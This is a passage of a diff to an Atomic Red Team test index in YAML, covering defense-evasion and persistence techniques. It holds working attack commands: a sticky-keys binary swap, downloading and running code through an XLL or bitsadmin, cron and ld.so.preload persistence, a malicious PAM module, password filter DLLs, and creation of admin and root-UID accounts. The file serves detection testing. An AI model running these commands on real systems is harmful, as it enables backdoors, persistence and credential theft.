#{file_or_folder}\T1222.001_cacls1.txt @@ -39521,7 +39521,7 @@ defense-evasion: executor: command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F -' + ' name: command_prompt - name: attrib - Remove read-only attribute auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 @@ -39539,10 +39539,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) -' + ' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -39552,7 +39552,7 @@ defense-evasion: executor: command: 'attrib.exe -r #{file_or_folder}\*.* /s -' + ' name: command_prompt - name: attrib - hide file auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c @@ -39575,7 +39575,7 @@ defense-evasion: attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt cleanup_command: 'del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1 -' + ' name: command_prompt - name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 @@ -39600,18 +39600,18 @@ defense-evasion: - description: 'Backup of original folder permissions should exist (for use in cleanup commands) -' + ' prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 -' + ' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1220: @@ -39725,37 +39725,37 @@ defense-evasion: dependencies: - description: 'XML file must exist on disk at specified location (#{xmlfile}) -' + ' prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: 'XSL file must exist on disk at specified location (#{xslfile}) -' + ' prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) -' + ' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" -' + ' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del #{msxsl_exe} >nul 2>&1 -' + ' name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 @@ -39783,26 +39783,26 @@ defense-evasion: dependencies: - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) -' + ' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" -' + ' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del -Path #{msxsl_exe} >nul 2>&1 -' + ' name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 description: 'Executes the code specified within a XSL script using a local payload. -' + ' supported_platforms: - windows input_arguments: @@ -39818,17 +39818,17 @@ defense-evasion: dependencies: - description: 'XSL file must exist on disk at specified location (#{local_xsl_file}) -' + ' prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" -' + ' name: command_prompt - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b @@ -39836,7 +39836,7 @@ defense-evasion: payload. Open Calculator.exe when test successfully executed, while AV turned off. -' + ' supported_platforms: - windows input_arguments: @@ -39851,7 +39851,7 @@ defense-evasion: executor: command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}" -' + ' name: command_prompt persistence: T1546.008: @@ -39945,7 +39945,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -39953,7 +39953,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: @@ -39987,7 +39987,7 @@ persistence: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: @@ -39998,7 +39998,7 @@ persistence: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1098: @@ -40075,7 +40075,7 @@ persistence: auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af description: 'Manipulate Admin Account Name -' + ' supported_platforms: - windows executor: @@ -40141,7 +40141,7 @@ persistence: dependencies: - description: 'PS Module ActiveDirectory -' + ' prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: | @@ -40164,14 +40164,14 @@ persistence: cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False -' + ' name: powershell - name: AWS - Create a group and add a user to that group auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 description: 'Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss -' + ' supported_platforms: - iaas:aws input_arguments: @@ -40183,14 +40183,14 @@ persistence: - description: 'Check if the user exists, we can only add a user to a group if the user exists. -' + ' prereq_command: 'aws iam list-users | grep #{username} -' + ' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic test -' + ' executor: command: | aws iam create-group --group-name #{username} @@ -40404,7 +40404,7 @@ persistence: command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))" -' + ' T1098.001: technique: external_references: @@ -40511,14 +40511,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: command: | Import-Module -Name AzureAD @@ -40591,14 +40591,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: command: | Import-Module -Name AzureAD @@ -40642,7 +40642,7 @@ persistence: description: 'Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised -' + ' supported_platforms: - iaas:aws input_arguments: @@ -40653,14 +40653,14 @@ persistence: dependencies: - description: 'Check if the user exists. -' + ' prereq_command: 'aws iam list-users | grep #{username} -' + ' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic -' + ' executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds @@ -40855,11 +40855,11 @@ persistence: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -40868,11 +40868,11 @@ persistence: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -40880,10 +40880,10 @@ persistence: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: @@ -40991,31 +40991,31 @@ persistence: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -41108,7 +41108,7 @@ persistence: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: @@ -41124,30 +41124,30 @@ persistence: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -41244,7 +41244,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -41428,10 +41428,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -41455,10 +41455,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -41496,7 +41496,7 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -41528,10 +41528,10 @@ persistence: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 -' + ' name: command_prompt T1547: technique: @@ -41856,7 +41856,7 @@ persistence: auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 description: 'Create a file called test.wma, with the duration of 30 seconds -' + ' supported_platforms: - linux - windows @@ -41876,7 +41876,7 @@ persistence: sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. -' + ' supported_platforms: - windows - macos @@ -41996,7 +41996,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42041,7 +42041,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42079,7 +42079,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42196,10 +42196,10 @@ persistence: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1136.003: @@ -42269,7 +42269,7 @@ persistence: activity do not interupt the normal functions of the compromised users and can remain undetected for a long time -' + ' supported_platforms: - iaas:aws input_arguments: @@ -42280,21 +42280,21 @@ persistence: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured -' + ' prereq_command: 'cat ~/.aws/credentials | grep "default" -' + ' get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure -' + ' executor: command: 'aws iam create-user --user-name #{username} -' + ' cleanup_command: 'aws iam delete-user --user-name #{username} -' + ' name: sh elevation_required: false T1078.004: @@ -42360,7 +42360,7 @@ persistence: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -42395,20 +42395,20 @@ persistence: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1542.002: technique: created: '2019-12-19T20:21:21.669Z' @@ -42645,7 +42645,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -42656,17 +42656,17 @@ persistence: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob @@ -42678,7 +42678,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -42689,20 +42689,20 @@ persistence: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1136: @@ -42884,7 +42884,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -42904,7 +42904,7 @@ persistence: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -42912,7 +42912,7 @@ persistence: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -42944,7 +42944,7 @@ persistence: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -42961,10 +42961,10 @@ persistence: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -43139,10 +43139,10 @@ persistence: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -43150,7 +43150,7 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -43270,7 +43270,7 @@ persistence: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -43281,10 +43281,10 @@ persistence: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1136.002: @@ -43336,7 +43336,7 @@ persistence: auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 description: 'Creates a new domain admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -43358,14 +43358,14 @@ persistence: net group "#{group}" "#{username}" /add /domain cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new account similar to ANONYMOUS LOGON auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -43380,10 +43380,10 @@ persistence: executor: command: 'net user "#{username}" "#{password}" /add /domain -' + ' cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new Domain Account using PowerShell @@ -43391,7 +43391,7 @@ persistence: description: 'Creates a new Domain User using the credentials of the Current User -' + ' supported_platforms: - windows input_arguments: @@ -43420,7 +43420,7 @@ persistence: $User cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" -' + ' name: powershell elevation_required: false T1078.002: @@ -43783,21 +43783,21 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -43822,18 +43822,18 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1546.014: technique: @@ -43894,7 +43894,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: @@ -44183,7 +44183,7 @@ persistence: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list -' + ' supported_platforms: - windows input_arguments: @@ -44196,12 +44196,12 @@ persistence: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" -' + ' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -44421,7 +44421,7 @@ persistence: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -44437,19 +44437,19 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -44633,7 +44633,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -44657,10 +44657,10 @@ persistence: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -44669,7 +44669,7 @@ persistence: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -44875,7 +44875,7 @@ persistence: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: @@ -44892,15 +44892,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true @@ -44994,7 +44994,7 @@ persistence: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -45011,15 +45011,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -45163,7 +45163,7 @@ persistence: auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 description: 'Create a user via useradd -' + ' supported_platforms: - linux input_arguments: @@ -45174,17 +45174,17 @@ persistence: executor: command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} -' + ' cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a user account on a MacOS system auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' description: 'Creates a user on a MacOS system with dscl -' + ' supported_platforms: - macos input_arguments: @@ -45206,7 +45206,7 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} -' + ' name: bash elevation_required: true - name: Create a new user in a command prompt @@ -45228,10 +45228,10 @@ persistence: executor: command: 'net user /add "#{username}" "#{password}" -' + ' cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create a new user in PowerShell @@ -45249,10 +45249,10 @@ persistence: executor: command: 'New-LocalUser -Name "#{username}" -NoPassword -' + ' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create a new user in Linux with `root` UID and GID. @@ -45260,7 +45260,7 @@ persistence: description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. -' + ' supported_platforms: - linux input_arguments: @@ -45278,14 +45278,14 @@ persistence: if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a new Windows admin user auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 description: 'Creates a new admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -45303,7 +45303,7 @@ persistence: net localgroup administrators "#{username}" /add cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1078.003: @@ -45431,7 +45431,7 @@ persistence: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: @@ -45660,7 +45660,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -45671,7 +45671,7 @@ persistence: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1556.004: technique: @@ -46040,11 +46040,11 @@ persistence: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" -' + ' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1 -' + ' name: command_prompt T1137.003: technique: @@ -46179,11 +46179,11 @@ persistence: command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f -' + ' cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1 -' + ' T1137.005: technique: external_references: @@ -46304,7 +46304,7 @@ persistence: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -46317,14 +46317,14 @@ persistence: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -46740,7 +46740,7 @@ persistence: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: @@ -46847,10 +46847,10 @@ persistence: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -46884,35 +46884,35 @@ persistence: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1205.001: technique: external_references: @@ -47045,11 +47045,11 @@ persistence: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ -' + ' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 